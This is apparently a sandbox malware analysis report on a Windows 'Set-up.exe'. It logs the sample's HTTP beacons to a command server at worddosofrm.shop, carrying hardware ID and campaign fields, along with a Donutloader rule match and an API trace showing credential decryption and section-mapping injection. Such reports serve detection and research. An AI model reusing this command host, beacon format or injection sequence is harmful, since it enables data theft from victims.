                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e6eZ8qtaDZ%2BmCyk79L%2B0xwDvr8qKKgrkXl9l0dRoYwVgf3EYgO65cZWsVm8m%2FnXh88b3TEHgSgHE0895o6JgfIpKlqnKE4WanORFGKl3sfzYgXOfKUBfSG3ncbXwOLPvrjgj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec2753a9d2d3b-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1613&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=8089&delivery_rate=1737252&cwnd=237&unsent_bytes=0&cid=64322049f635abb8&ts=769&x=0"
                                                                                                                                2024-11-07 16:39:29 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0d 0a
                                                                                                                                Data Ascii: 11ok 173.254.250.79
                                                                                                                                2024-11-07 16:39:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.449745104.21.16.1424436544C:\Users\user\Desktop\Set-up.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-07 16:39:30 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=ALCFCPHXC9MFFVET4DI3NY
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 7129
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:30 UTC7129OUTData Raw: 2d 2d 41 4c 43 46 43 50 48 58 43 39 4d 46 46 56 45 54 34 44 49 33 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 30 31 35 42 46 46 43 33 45 45 30 41 31 35 36 36 32 36 44 37 38 32 38 33 37 34 42 36 42 0d 0a 2d 2d 41 4c 43 46 43 50 48 58 43 39 4d 46 46 56 45 54 34 44 49 33 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 4c 43 46 43 50 48 58 43 39 4d 46 46 56 45 54 34 44 49 33 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42
                                                                                                                                Data Ascii: --ALCFCPHXC9MFFVET4DI3NYContent-Disposition: form-data; name="hwid"6A5015BFFC3EE0A156626D7828374B6B--ALCFCPHXC9MFFVET4DI3NYContent-Disposition: form-data; name="pid"1--ALCFCPHXC9MFFVET4DI3NYContent-Disposition: form-data; name="lid"B
                                                                                                                                2024-11-07 16:39:30 UTC1011INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:30 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=6vn87lqflk7cq1jnjdc60lacek; expires=Mon, 03-Mar-2025 10:26:09 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pC7RaOqIzfbhSW2ZkcgKsG3PrlLULifOohz1FlO3%2F55A0CIGsc0isqzfsFz0zdeUjcURNAZTFYi3hBKR8esSdpy%2B%2FkvFjDBmVdTXr4RECsYSIXybH7W7fKAZ2QO%2FwBvLdtDI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec27e6dbbe746-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1339&sent=6&recv=12&lost=0&retrans=0&sent_bytes=2840&recv_bytes=8050&delivery_rate=2156366&cwnd=251&unsent_bytes=0&cid=38c97ac0a4012034&ts=498&x=0"
                                                                                                                                2024-11-07 16:39:30 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0d 0a
                                                                                                                                Data Ascii: 11ok 173.254.250.79
                                                                                                                                2024-11-07 16:39:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                7192.168.2.449746104.21.16.1424436544C:\Users\user\Desktop\Set-up.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-07 16:39:31 UTC293OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=4Y5L8AKJLU3H5MK5B6ICOFB232B8L7
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 1322
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:31 UTC1322OUTData Raw: 2d 2d 34 59 35 4c 38 41 4b 4a 4c 55 33 48 35 4d 4b 35 42 36 49 43 4f 46 42 32 33 32 42 38 4c 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 30 31 35 42 46 46 43 33 45 45 30 41 31 35 36 36 32 36 44 37 38 32 38 33 37 34 42 36 42 0d 0a 2d 2d 34 59 35 4c 38 41 4b 4a 4c 55 33 48 35 4d 4b 35 42 36 49 43 4f 46 42 32 33 32 42 38 4c 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 59 35 4c 38 41 4b 4a 4c 55 33 48 35 4d 4b 35 42 36 49 43 4f 46 42 32 33 32 42 38 4c 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f
                                                                                                                                Data Ascii: --4Y5L8AKJLU3H5MK5B6ICOFB232B8L7Content-Disposition: form-data; name="hwid"6A5015BFFC3EE0A156626D7828374B6B--4Y5L8AKJLU3H5MK5B6ICOFB232B8L7Content-Disposition: form-data; name="pid"1--4Y5L8AKJLU3H5MK5B6ICOFB232B8L7Content-Disposition: fo
                                                                                                                                2024-11-07 16:39:32 UTC1014INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:32 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=s8i5v99rgrjtubp3ublhp202lc; expires=Mon, 03-Mar-2025 10:26:11 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sRjGJ2gIpah7EQqa4FiZTDdihQoQnY5Mo2MAlaEI0OY3FnUeAMA%2FYE%2BbQUic%2BsFYIOptYk%2FWbYYmR8bUOAKXtHGlNTqWgRh7R%2FNxK2x7ARi%2BGTuzRpddRnXmJfxwDvbh25Pc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec2895a1d2cbd-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1431&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2251&delivery_rate=2011111&cwnd=240&unsent_bytes=0&cid=2315a0d1f07464cb&ts=747&x=0"
                                                                                                                                2024-11-07 16:39:32 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0d 0a
                                                                                                                                Data Ascii: 11ok 173.254.250.79
                                                                                                                                2024-11-07 16:39:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                8192.168.2.449747104.21.16.1424436544C:\Users\user\Desktop\Set-up.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-07 16:39:33 UTC285OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=3EC22CYO6BIE0TIXW6C3VN
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 1144
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:33 UTC1144OUTData Raw: 2d 2d 33 45 43 32 32 43 59 4f 36 42 49 45 30 54 49 58 57 36 43 33 56 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 30 31 35 42 46 46 43 33 45 45 30 41 31 35 36 36 32 36 44 37 38 32 38 33 37 34 42 36 42 0d 0a 2d 2d 33 45 43 32 32 43 59 4f 36 42 49 45 30 54 49 58 57 36 43 33 56 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 33 45 43 32 32 43 59 4f 36 42 49 45 30 54 49 58 57 36 43 33 56 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42
                                                                                                                                Data Ascii: --3EC22CYO6BIE0TIXW6C3VNContent-Disposition: form-data; name="hwid"6A5015BFFC3EE0A156626D7828374B6B--3EC22CYO6BIE0TIXW6C3VNContent-Disposition: form-data; name="pid"1--3EC22CYO6BIE0TIXW6C3VNContent-Disposition: form-data; name="lid"B
                                                                                                                                2024-11-07 16:39:34 UTC1014INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:34 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=qg3got8n56ln4h2p8h5qbempav; expires=Mon, 03-Mar-2025 10:26:12 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=euuhN%2FytGlnfdgQjd8qfA5mKAZlVU%2FhUZfvyf%2FLJkyDneH4WqiY24fw%2Bh%2BzSoTxZ0hyaDhsJ8gErZxv2HFz6qkv3%2B1uz8iECPgZd3vxGYrx2JMhf1155w2DmCrzk6iEwPxgO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec29229602e2d-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1083&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2065&delivery_rate=2616079&cwnd=251&unsent_bytes=0&cid=f2f0efe20a00bee0&ts=998&x=0"
                                                                                                                                2024-11-07 16:39:34 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 0d 0a
                                                                                                                                Data Ascii: 11ok 173.254.250.79
                                                                                                                                2024-11-07 16:39:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                9192.168.2.449748104.21.16.1424436544C:\Users\user\Desktop\Set-up.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-07 16:39:35 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 117
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:35 UTC117OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 61 62 6f 62 61 34 35 26 6a 3d 37 63 32 36 33 33 35 37 64 30 34 61 66 66 34 37 33 63 62 32 65 64 61 38 61 34 32 66 66 30 33 33 26 68 77 69 64 3d 36 41 35 30 31 35 42 46 46 43 33 45 45 30 41 31 35 36 36 32 36 44 37 38 32 38 33 37 34 42 36 42
                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=BVnUqo--@aboba45&j=7c263357d04aff473cb2eda8a42ff033&hwid=6A5015BFFC3EE0A156626D7828374B6B
                                                                                                                                2024-11-07 16:39:35 UTC1013INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:35 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=5c7dr17fds00pcjub0as0sgj8n; expires=Mon, 03-Mar-2025 10:26:14 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yynuk%2BEm6eecgwIOz8TbWXI9JGZNRNSii0dvblzZvxal8NdK2rkMqQ5BUF27SIB%2FUvW49NYS20Ry2UNn9gq%2FTdF9TRokMkjqgfCLjQAFNtTSq%2Fuc%2Fm%2F7aIC1Z4XQ7YNlDZpb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec29c583ce7af-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1368&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1018&delivery_rate=2166043&cwnd=78&unsent_bytes=0&cid=bed49aeae4171e18&ts=353&x=0"
                                                                                                                                2024-11-07 16:39:35 UTC126INData Raw: 37 38 0d 0a 74 6b 44 73 39 49 38 49 61 4b 62 77 4f 5a 55 71 47 5a 61 32 2f 64 73 7a 68 48 4d 79 73 30 72 35 44 4b 42 44 56 58 71 65 72 43 6e 74 4f 38 36 42 72 54 4a 4b 7a 6f 52 4e 35 52 42 46 75 65 72 53 36 67 65 7a 58 51 61 47 5a 4d 30 37 6a 6e 74 6b 4a 72 48 50 52 74 67 6f 67 34 66 37 4a 67 33 65 6c 52 75 35 43 48 2f 69 6c 4d 66 72 48 36 59 57 45 49 6c 36 68 46 45 3d 0d 0a
                                                                                                                                Data Ascii: 78tkDs9I8IaKbwOZUqGZa2/dszhHMys0r5DKBDVXqerCntO86BrTJKzoRN5RBFuerS6gezXQaGZM07jntkJrHPRtgog4f7Jg3elRu5CH/ilMfrH6YWEIl6hFE=
                                                                                                                                2024-11-07 16:39:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:11:39:05
                                                                                                                                Start date:07/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\Set-up.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\Set-up.exe"
                                                                                                                                Imagebase:0xe30000
                                                                                                                                File size:14'085'344 bytes
                                                                                                                                MD5 hash:206D3EDE48DB6ABCD0887AAB3442A590
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:1.9%
                                                                                                                                  Dynamic/Decrypted Code Coverage:87.3%
                                                                                                                                  Signature Coverage:39.1%
                                                                                                                                  Total number of Nodes:220
                                                                                                                                  Total number of Limit Nodes:31
                                                                                                                                  execution_graph 71560 58f200f 71564 58ede60 71560->71564 71562 58f2016 CoUninitialize 71563 58f2040 71562->71563 71565 58ede74 71564->71565 71565->71562 71566 5920890 71567 59208b0 71566->71567 71570 59208ee 71567->71570 71572 591ce20 LdrInitializeThunk 71567->71572 71568 592096e 71570->71568 71573 591ce20 LdrInitializeThunk 71570->71573 71572->71570 71573->71568 71574 58f170d 71575 58f1730 71574->71575 71576 58f1871 ExitProcess 71575->71576 71599 59024a0 71576->71599 71578 58f1886 71579 58f1890 ExitProcess 71578->71579 71580 5902c20 LdrInitializeThunk 71579->71580 71581 58f18a2 71580->71581 71582 58f18ac ExitProcess 71581->71582 71583 5902e30 LdrInitializeThunk 71582->71583 71584 58f18be 71583->71584 71585 58f18c8 ExitProcess 71584->71585 71586 58f18da 71585->71586 71587 5905d60 LdrInitializeThunk 71586->71587 71588 58f18ec 71587->71588 71589 5906180 LdrInitializeThunk 71588->71589 71590 58f18f5 71589->71590 71591 5908b30 LdrInitializeThunk 71590->71591 71592 58f18fe 71591->71592 71593 58f1908 ExitProcess 71592->71593 71594 58f191a 71593->71594 71595 58f1924 ExitProcess 71594->71595 71596 58f1936 71595->71596 71597 5911c40 6 API calls 71596->71597 71598 58f193f 71597->71598 71600 5902500 71599->71600 71600->71600 71603 5920670 71600->71603 71602 5902671 71604 5920690 71603->71604 71605 592078e 71604->71605 71607 591ce20 LdrInitializeThunk 71604->71607 71605->71602 71607->71605 71639 58f43ed 71643 58f4410 71639->71643 71640 58f4d3a ExitProcess 71644 58f7c10 71640->71644 71642 58f27f5 71643->71640 71643->71642 71645 58f7c23 71644->71645 71648 5920500 71645->71648 71647 58f7ddd 71649 5920520 71648->71649 71650 592061e 71649->71650 71652 591ce20 LdrInitializeThunk 71649->71652 71650->71647 71652->71650 71653 1129635 GetLastError 71654 112964b 71653->71654 71657 1129651 71653->71657 71684 112a040 11 API calls 2 library calls 71654->71684 71656 11296a0 SetLastError 71657->71656 71658 112966b 71657->71658 71686 112a096 11 API calls 2 library calls 71657->71686 71685 1126f59 HeapFree GetLastError _free 71658->71685 71661 1129680 71661->71658 71662 1129687 71661->71662 71687 112949b HeapFree GetLastError EnterCriticalSection LeaveCriticalSection 71662->71687 71663 1129671 71665 11296ac SetLastError 71663->71665 71679 11231a0 71665->71679 71666 1129692 71688 1126f59 HeapFree GetLastError _free 71666->71688 71669 11296b8 GetLastError 71672 11296d2 71669->71672 71674 11296d8 71669->71674 71670 1129699 71670->71656 71670->71665 71673 112a040 11 API calls 71672->71673 71673->71674 71675 1126f59 _free HeapFree GetLastError 71674->71675 71676 11296f8 SetLastError 71675->71676 71678 1129738 71676->71678 71689 1129876 EnterCriticalSection LeaveCriticalSection _abort 71679->71689 71681 11231a5 71690 1124d9f 22 API calls _abort 71681->71690 71683 11231e2 71684->71657 71685->71663 71686->71661 71687->71666 71688->71670 71689->71681 71690->71683 71608 58f1207 CoInitializeSecurity 71691 58f8a64 71692 58f8a6b 71691->71692 71693 5920670 LdrInitializeThunk 71692->71693 71694 58f8ba4 71693->71694 71609 58ed2c0 71613 58ed2c9 71609->71613 71610 58ed358 ExitProcess 71611 58ed353 71619 591cd30 FreeLibrary 71611->71619 71613->71610 71613->71611 71613->71613 71614 58ed32a GetCurrentThreadId GetForegroundWindow 71613->71614 71615 58ed33a GetCurrentProcessId 71614->71615 71616 58ed340 71614->71616 71615->71616 71616->71611 71618 58efc90 FreeLibrary 71616->71618 71618->71611 71619->71610 71695 5900260 71696 5900274 71695->71696 71700 5900375 71695->71700 71696->71696 71701 59003a0 71696->71701 71702 59003b0 71701->71702 71702->71702 71703 5920670 LdrInitializeThunk 71702->71703 71704 59004bf 71703->71704 71620 58f841d 71622 58f8430 71620->71622 71621 58f85b6 CryptUnprotectData 71622->71621 71705 58f1239 71708 5917490 71705->71708 71707 58f1243 71709 59174f0 CoCreateInstance 71708->71709 71711 59175b0 SysAllocString 71709->71711 71712 5917aee 71709->71712 71715 5917658 71711->71715 71713 5917b06 GetVolumeInformationW 71712->71713 71724 5917b21 71713->71724 71716 5917664 CoSetProxyBlanket 71715->71716 71717 5917add SysFreeString 71715->71717 71718 5917684 SysAllocString 71716->71718 71722 5917aae 71716->71722 71717->71712 71720 5917760 71718->71720 71720->71720 71721 591779f SysAllocString 71720->71721 71723 59177c0 71721->71723 71722->71717 71723->71722 71725 591780c VariantInit 71723->71725 71724->71707 71724->71724 71727 5917860 71725->71727 71726 5917a9d VariantClear 71726->71722 71727->71726 71728 58f1a36 71729 58f1a3c 71728->71729 71732 58f5440 71729->71732 71731 58f1a45 71735 58f545a 71732->71735 71733 58f5461 71733->71731 71735->71733 71737 591ce20 LdrInitializeThunk 71735->71737 71738 5920370 LdrInitializeThunk 71735->71738 71739 59209c0 LdrInitializeThunk 71735->71739 71737->71735 71738->71735 71739->71735 71740 54703fb 71741 5470409 71740->71741 71754 5470d4b 71741->71754 71743 547088f 71744 54705a1 GetPEB 71746 547061e 71744->71746 71745 547055c 71745->71743 71745->71744 71757 5470b0b 71746->71757 71749 547067f CreateThread 71750 5470657 71749->71750 71768 54709bb GetPEB 71749->71768 71750->71743 71765 547100b GetPEB 71750->71765 71752 5470b0b 4 API calls 71752->71743 71753 54706d9 71753->71743 71753->71752 71766 5470d6b GetPEB 71754->71766 71756 5470d58 71756->71745 71758 5470b21 CreateToolhelp32Snapshot 71757->71758 71760 5470651 71758->71760 71761 5470b58 Thread32First 71758->71761 71760->71749 71760->71750 71761->71760 71762 5470b7f 71761->71762 71762->71760 71763 5470bb6 Wow64SuspendThread 71762->71763 71764 5470be0 CloseHandle 71762->71764 71763->71764 71764->71762 71765->71753 71767 5470d86 71766->71767 71767->71756 71771 5470a14 71768->71771 71769 5470a74 CreateThread 71769->71771 71772 54711eb 71769->71772 71770 5470ac1 71771->71769 71771->71770 71775 54c01b0 71772->71775 71776 54c02bf 71775->71776 71777 54c01d5 71775->71777 71787 54c148b 71776->71787 71808 54c2a32 71777->71808 71780 54c01ed 71781 54c2a32 LoadLibraryA 71780->71781 71786 54711f0 71780->71786 71782 54c022f 71781->71782 71783 54c2a32 LoadLibraryA 71782->71783 71784 54c024b 71783->71784 71785 54c2a32 LoadLibraryA 71784->71785 71785->71786 71788 54c2a32 LoadLibraryA 71787->71788 71789 54c14ae 71788->71789 71790 54c2a32 LoadLibraryA 71789->71790 71791 54c14c6 71790->71791 71792 54c2a32 LoadLibraryA 71791->71792 71793 54c14e4 71792->71793 71794 54c14f9 VirtualAlloc 71793->71794 71806 54c150d 71793->71806 71796 54c1527 71794->71796 71794->71806 71795 54c2a32 LoadLibraryA 71798 54c15a5 71795->71798 71796->71795 71796->71806 71797 54c2a32 LoadLibraryA 71799 54c15fb 71797->71799 71798->71799 71798->71806 71812 54c2839 71798->71812 71799->71797 71801 54c165d 71799->71801 71799->71806 71801->71806 71807 54c16bf 71801->71807 71838 54c061b LoadLibraryA 71801->71838 71803 54c16a8 71803->71806 71839 54c0716 LoadLibraryA 71803->71839 71806->71786 71807->71806 71816 54c1bbb 71807->71816 71809 54c2a49 71808->71809 71810 54c2a70 71809->71810 71842 54c0b37 LoadLibraryA 71809->71842 71810->71780 71814 54c284e 71812->71814 71813 54c28c4 LoadLibraryA 71815 54c28ce 71813->71815 71814->71813 71814->71815 71815->71798 71817 54c1bf6 71816->71817 71818 54c1c3d NtCreateSection 71817->71818 71820 54c1c62 71817->71820 71837 54c226a 71817->71837 71818->71820 71818->71837 71819 54c1cf7 NtMapViewOfSection 71829 54c1d17 71819->71829 71820->71819 71820->71837 71821 54c2040 VirtualAlloc 71827 54c2082 71821->71827 71822 54c2839 LoadLibraryA 71822->71829 71823 54c2839 LoadLibraryA 71825 54c1f9e 71823->71825 71824 54c2133 VirtualProtect 71826 54c21fe VirtualProtect 71824->71826 71833 54c2153 71824->71833 71825->71821 71825->71823 71828 54c203c 71825->71828 71840 54c28d7 LoadLibraryA 71825->71840 71831 54c222d 71826->71831 71827->71824 71835 54c2120 NtMapViewOfSection 71827->71835 71827->71837 71828->71821 71829->71822 71829->71825 71830 54c28d7 LoadLibraryA 71829->71830 71829->71837 71830->71829 71831->71837 71841 54c25ec LoadLibraryA 71831->71841 71833->71826 71836 54c21d8 VirtualProtect 71833->71836 71835->71824 71835->71837 71836->71833 71837->71806 71838->71803 71839->71807 71840->71825 71841->71837 71842->71809 71843 58f1fb1 CoInitializeEx CoInitializeEx

                                                                                                                                  Executed Functions

                                                                                                                                  Function 058F5440 Relevance: 109.4, Strings: 86, Instructions: 1878COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $ $#$$$)$+$,$-$/$2$3$5$7$8$9$:$:$;$<$A$B$B$C$C$C$D$D$D$E$G$I$K$K$L$M$M$O$O$O$P$P$Q$R$S$S$T$U$U$U$W$Y$Z$[$]$]$_$`$b$c$d$f$f$i$k$p$q$q$q$q$r$s$s$s$u$u$u$w$w$w$w$x$x$y${$}$~
                                                                                                                                  • API String ID: 0-581412767
                                                                                                                                  • Opcode ID: ba45db846503753e6ad8cd74702e647084946835c16c25e977fe34de56c6ae81
                                                                                                                                  • Instruction ID: 182163949eeda5fcdd4c5ddd22517cfb662c3115da359767ce5eb4e2f496d273
                                                                                                                                  • Opcode Fuzzy Hash: ba45db846503753e6ad8cd74702e647084946835c16c25e977fe34de56c6ae81
                                                                                                                                  • Instruction Fuzzy Hash: D603BF7150C7C18AD335DB3884887AFBBE2ABDA324F084A6DE9D9C7392D77588458713
                                                                                                                                  Function 05917490 Relevance: 26.9, APIs: 9, Strings: 6, Instructions: 663memorycomCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
